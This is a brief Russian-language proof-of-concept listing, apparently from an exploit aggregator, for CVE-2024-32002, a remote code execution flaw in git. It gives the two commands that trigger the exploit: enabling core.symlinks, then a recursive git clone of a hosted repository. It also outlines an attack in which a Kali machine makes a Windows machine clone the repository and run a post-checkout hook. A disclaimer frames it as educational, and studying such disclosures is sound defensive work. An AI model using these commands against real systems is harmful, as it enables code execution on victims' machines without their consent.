## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-EQSTLAB-GIT_RCE
# CVE-2024-32002 PoC
1. Необходимо настроить параметр символических ссылок git следующим образом:
root@kitploit:~
git config --global core.symlinks true
2. Затем эксплуатируйте CVE-2024-32002 следующей командой:
root@kitploit:~
git clone --recursive https://github.com/EQSTSeminar/git_rce.git
# Сценарий атаки
kali(192.168.216.129) --Передаёт адрес удалённого репозитория--> Win(192.168.216.130)
kali(192.168.216.129) <\--Выполнение git clone && hook-скрипта (post-checkout)-- Win(192.168.216.130)
# Дисклеймер
Этот репозиторий не предназначен для использования в качестве эксплойта RCE через git clone для CVE-2024-32002. Цель этого проекта — помочь людям узнать об этой уязвимости и, возможно, протестировать свои собственные приложения.
# Анализ
https://skshieldus.com/eng/business/insight.do#